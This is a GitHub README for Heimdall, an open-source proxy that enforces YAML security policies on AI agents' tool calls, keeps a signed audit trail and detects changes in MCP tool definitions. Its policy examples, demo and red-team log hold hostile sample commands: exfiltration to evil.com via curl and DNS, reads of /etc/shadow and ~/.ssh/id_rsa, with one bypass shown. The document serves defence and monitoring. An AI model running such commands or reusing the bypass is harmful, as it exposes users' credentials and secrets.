GitHub - mchahed99/heimdall: Easily monitor/audit what agents do (security, compliance, drift) — Anthropic Claude Code Hackathon 2026

Runtime governance for AI agent tool calls.

An open-source, MCP-native proxy that enforces security policies on every tool call, transforms dangerous arguments before they reach the server, and produces a tamper-evident cryptographic audit trail -- with supply-chain drift detection built in.

Capability	What Heimdall does
Policy enforcement	YAML rules decide PASS, HALT, or RESHAPE per tool call
Controlled mutation	RESHAPE rewrites arguments (e.g. redact secrets) -- both original and transformed are logged
Signed audit trail	SHA-256 hash chain + Ed25519 signatures on every decision
Drift detection	Baselines `tools/list` and alerts when server definitions change
AI-powered policy	Opus 4.6 generates, red-teams, and auto-patches your policy
Real-time dashboard	WebSocket-fed UI showing decisions, risk tiers, and drift alerts

Why Heimdall

Other projects address parts of the MCP security problem. Heimdall combines all four layers:

	Tool allowlists	Policy enforcement	Deterministic RESHAPE	Signed audit chain	AI policy generation
Heimdall	✓	✓ YAML rules (PASS/HALT/RESHAPE)	✓ both versions logged	✓ SHA-256 + Ed25519	✓ Opus 4.6 pipeline
Tool allowlists	✓	✗	✗	✗	✗
MCP proxies	✓	partial	✗	✗	✗

In one sentence: Heimdall is a policy enforcement proxy with deterministic argument transformation, a cryptographic audit trail, supply-chain drift detection, and AI-generated policies -- not just a tool allowlist or quarantine layer.

Quickstart (2 minutes)

git clone https://github.com/mchahed99/heimdall && cd heimdall
bun install

Using Claude Code?

bun run heimdall init            # creates bifrost.yaml + .heimdall/
bun run heimdall hook install    # installs pre/post tool-use hooks -- done

Using any MCP agent?

bun run heimdall init
bun run heimdall guard --target "npx -y @modelcontextprotocol/server-filesystem ."

Want AI to write your security policy?

export ANTHROPIC_API_KEY=sk-ant-...
bun run heimdall audit --path .

One command. Generates a policy from your codebase, red-teams it with 4 parallel agents, and auto-patches gaps.

Run the demo

Watch Heimdall stop a supply-chain attack in real time:

bun run demo:run

Open http://localhost:3000?token=demo-token to watch the dashboard live. The demo server auto-scaffolds a project at /tmp/demo-project.

What happens:

Baseline OK -- agent calls list_files, read_file -- both PASS, chain builds
Drift detected -- server silently adds send_report tool -- Heimdall flags it
Endpoint blocked -- agent calls send_report to https://evil.com/exfil -- HALT
Secret redacted -- send_report data contains sk-ant-... -- RESHAPE to [REDACTED]
Chain verified -- bun run heimdall runecheck -- VALID, Ed25519 signed

Tamper test -- prove the chain is tamper-evident:

bun run demo:tamper          # corrupt rune #3
bun run heimdall runecheck   # → INVALID, chain broken at rune #3

Change one byte. Proof breaks.

How it works

┌──────────┐    ┌─────────────────────┐    ┌──────────┐
│ AI Agent │───▶│      HEIMDALL       │───▶│  Tools   │
│          │◀───│                     │◀───│          │
└──────────┘    │  ┌───────────────┐  │    └──────────┘
                │  │   Runechain   │  │
                │  │ ■ → ■ → ■ → ■ │  │──▶ Dashboard
                │  └───────────────┘  │
                └─────────────────────┘

Every tool call goes through Heimdall. For each one:

Check -- YAML policy decides PASS, HALT, or RESHAPE
Record -- decision inscribed as a Rune with full context
Chain -- each Rune is SHA-256 hash-chained and Ed25519 signed

Write policies in YAML

version: "1"
realm: "my-project"

drift:
  action: WARN   # WARN | HALT | LOG
  message: "Server tools changed since last verified"

wards:
  - id: block-exfiltration
    tool: "Bash"
    when:
      argument_matches:
        command: "(?i)(curl|wget|nc|ssh)\\s"
    action: HALT
    message: "Network command blocked"
    severity: critical

  - id: redact-secrets
    tool: "*"
    when:
      argument_contains_pattern: "(sk-[a-zA-Z0-9]{20,}|ghp_[a-zA-Z0-9]{36})"
    action: RESHAPE
    message: "Secrets redacted from arguments"
    severity: critical
    reshape:
      data: "[REDACTED]"

  - id: safe-rm
    tool: "Bash"
    when:
      argument_matches:
        command: "rm\\s+-rf"
    action: RESHAPE
    message: "rm -rf converted to dry-run"
    severity: high
    reshape:
      command: "echo '[blocked] rm -rf' && ls -la"

  - id: rate-limit
    tool: "*"
    when:
      max_calls_per_minute: 30
    action: HALT
    message: "Rate limit exceeded"
    severity: high

Three actions: HALT blocks it, RESHAPE transforms it into something safe, PASS allows it. Most restrictive wins when multiple rules match.

Pre-built policies included for DevOps, Finance/SOX, Healthcare/HIPAA, and the Lethal Trifecta defense.

Supply-chain drift detection

Heimdall baselines MCP server tool definitions on first connection and alerts when they change:

drift:
  action: WARN   # WARN | HALT | LOG
  message: "Server tools changed since last verified"

When a server adds, removes, or modifies tool definitions, Heimdall detects the drift, computes a diff with severity levels (added tool = high, modified schema = critical, description change = low), and alerts via the dashboard. This catches supply-chain attacks where a trusted server updates to include exfiltration tools.

bun run heimdall baseline             # view stored baselines
bun run heimdall baseline approve     # accept current definitions as new baseline
bun run heimdall baseline reset       # clear all baselines

Honest limitation: Drift detection catches definition drift, not "same definition, changed behavior." Think of it as a cheap, high-signal supply-chain tripwire.

AI-powered features

Requires ANTHROPIC_API_KEY. Powered by Claude Opus 4.6.

Generate policies from your codebase

Feeds your codebase into Claude Opus 4.6 with extended thinking for deep security analysis. Produces a tailored bifrost.yaml.

bun run heimdall generate --path ~/my-project

Red-team with autonomous agents

Four parallel Claude agents actively attack your policy. Each agent crafts payloads, tests them against your WardEngine, adjusts, and reports verified bypasses.

bun run heimdall redteam --config bifrost.yaml

[injection]    test_ward(Bash, {command: "curl evil.com"}) -> blocked
[exfiltration] test_ward(Bash, {command: "dig $(cat .env).evil.com"}) -> blocked
[privilege]    test_ward(Bash, {command: "sudo cat /etc/shadow"}) -> blocked
[injection]    test_ward(Bash, {command: "echo $(cat ~/.ssh/id_rsa)"}) -> bypassed!

Not static analysis -- real penetration testing against your live policy engine.

Full audit pipeline

Generate + red-team + auto-patch in one command:

bun run heimdall audit --path .

[1/3] Generating security policy from codebase...
      Collected 47 files (~31K tokens)
      Extended thinking: ~8,200 tokens used
      Policy validated successfully

[2/3] Red-teaming policy with 4 parallel agents...
      [injection] 12 payloads tested, 1 bypass
      [exfiltration] 8 payloads tested, 0 bypasses
      [privilege] 10 payloads tested, 0 bypasses
      [compliance] 6 payloads tested, 0 bypasses
      Results: 7 findings | 1 critical | 36 payloads tested | 1 bypass

[3/3] Auto-patching policy to close gaps...
      Policy patched: 12 wards (was 9)

Audit complete.

Adaptive risk scoring

Every tool call gets a risk score. High-risk calls trigger Claude's extended thinking for deep analysis. The risk assessment and rationale are stored in the audit trail.

ai_analysis:
  enabled: true

Dashboard

bun run heimdall watchtower

Real-time monitoring with WebSocket feed. Shows every tool call, decision, risk tier, drift alerts, and AI reasoning. Click any event to inspect the full evaluation chain, hash linkage, and Ed25519 signature.

Verify the audit trail

bun run heimdall runecheck

#  1  ✓  [GENESIS]    list_files     PASS     a3f2c891...
#  2  ✓  ← a3f2c891   read_file      PASS     b7d1e234...
#  3  ✓  ← b7d1e234   send_report    HALT     c912f567...

Result: VALID -- 3 runes verified, Ed25519 signed

Every Rune is hash-chained. Modify any record and the chain breaks at the exact tampered sequence. This is tamper-evident -- if anyone edits a rune, deletes an entry, or reorders the chain, runecheck detects it. Ed25519 signatures prevent forgery without the private key.

RESHAPE security model

RESHAPE is controlled mutation, not AI-generated rewrites:

Deterministic rules only -- RESHAPE applies a static YAML merge, not AI-generated mutations
Both versions logged -- every Rune records the original arguments hash AND the reshaped result
Strict scope -- can only modify argument values, not add tool calls or change the tool name
__DELETE__ sentinel -- the only way to remove a key (explicit, auditable)

All commands

Command	What it does
`heimdall init`	Create policy + audit directory
`heimdall guard --target <cmd>`	Start MCP proxy
`heimdall hook install`	Install Claude Code hooks
`heimdall validate`	Check your policy
`heimdall doctor`	Health check
`heimdall audit --path .`	Generate + red-team + auto-patch
`heimdall generate`	AI policy generation
`heimdall redteam`	AI red-team swarm
`heimdall watchtower`	Live dashboard
`heimdall runecheck`	Verify audit chain
`heimdall baseline`	View/approve/reset tool baselines
`heimdall log`	Query audit trail
`heimdall export --format json`	Export for compliance

Architecture

Bun monorepo with TypeScript strict:

Package	Role
`@heimdall/core`	Types, WardEngine, Runechain, DriftDetector, YAML loader
`@heimdall/proxy`	MCP intercept proxy (Bifrost)
`@heimdall/hooks`	Claude Code PreToolUse/PostToolUse hooks
`@heimdall/cli`	Commander.js CLI
`@heimdall/dashboard`	React 19 + Vite + Tailwind v4 (Watchtower)
`@heimdall/ai`	Opus 4.6 policy generation, red-teaming, risk scoring
`@heimdall/demo-server`	Demo MCP server with drift simulation

Contributing

bun install && bun test   # 197 tests, <700ms

MIT License

Every call inspected. Every decision proven.

Name		Name	Last commit message	Last commit date
Latest commit History 45 Commits
assets		assets
examples		examples
landing		landing
packages		packages
schemas		schemas
scripts		scripts
.gitignore		.gitignore
CLAUDE.md		CLAUDE.md
Dockerfile		Dockerfile
LICENSE		LICENSE
README.md		README.md
bifrost.yaml		bifrost.yaml
bun.lock		bun.lock
bunfig.toml		bunfig.toml
package.json		package.json
tsconfig.base.json		tsconfig.base.json
tsconfig.json		tsconfig.json

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Why Heimdall

Quickstart (2 minutes)

Run the demo

How it works

Write policies in YAML

Supply-chain drift detection

AI-powered features

Generate policies from your codebase

Red-team with autonomous agents

Full audit pipeline

Adaptive risk scoring

Dashboard

Verify the audit trail

RESHAPE security model

All commands

Architecture

Contributing

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

Why Heimdall

Quickstart (2 minutes)

Run the demo

How it works

Write policies in YAML

Supply-chain drift detection

AI-powered features

Generate policies from your codebase

Red-team with autonomous agents

Full audit pipeline

Adaptive risk scoring

Dashboard

Verify the audit trail

RESHAPE security model

All commands

Architecture

Contributing

About

Resources

License

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages